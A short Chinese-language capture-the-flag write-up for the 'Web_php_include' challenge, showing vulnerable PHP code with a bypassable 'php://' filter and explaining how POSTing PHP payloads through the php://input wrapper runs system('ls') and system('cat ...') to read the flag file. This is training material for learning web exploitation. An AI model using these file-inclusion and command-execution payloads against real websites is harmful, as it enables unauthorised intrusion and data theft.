Web_php_include 攻防世界

复制代码
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {    以是否检测到php://为判断执行循环
    $page=str_replace("php://", "", $page);//传入空值,替换
}
include($page);
?>

综上分析,get方式好像挺难去看到这个flag的,因为这种代码下的flag通常放在一个文件中,需要先展开ls,然后在cat查看。那我们就尝试用post传参

准备好一个Firefox 一个max hackbar

通过php伪协议php://input

首先post传入第一个命令 ,这个命令用来展开目录

复制代码
<php
system("ls")
?>

随后得到fl4gisisish3r3.php 一般这种文件就是flag,

我们使用

复制代码
<?php
system("cat fl4gisisish3r3.php ")//查看文件下的flag
?>

有的flag会直接在屏幕上,有的就藏在背后i的代码里,这个就是

相关推荐
身如柳絮随风扬20 小时前
Servlet:访问流程、核心接口与生命周期
java·servlet·web
钛态1 天前
前端WebSocket实时通信:别再用轮询了!
前端·vue·react·web
爱学习的程序媛1 天前
浏览器内核揭秘:JavaScript 和 UI 的“主线程争夺战”
前端·性能优化·浏览器·web
Pure_White_Sword2 天前
[广东省大学生攻防大赛 2022]pyre
网络安全·ctf·reverse·逆向工程
泷羽Sec-静安2 天前
AICTFer一天速成指南
python·sql·ctf
ad禥思妙想3 天前
BUUCTF_刷题记录(二)
ctf
曲幽3 天前
FastAPI自动生成的API文档太丑?我花了一晚上把它改成了客户愿意付费的样子
python·fastapi·web·swagger·openapi·scalar·docs
0vvv04 天前
2026-NCTF-web-N-RustPICA
前端·ctf
yv_304 天前
ssti靶场练习(sstilabs,重庆橘子科技)
ctf·ssti
曲幽4 天前
告别手写 API 胶水代码:FastAPI 与 Vue 的“契约自动机” OpenAPI 实战
python·typescript·vue·fastapi·web·swagger·openapi·codegen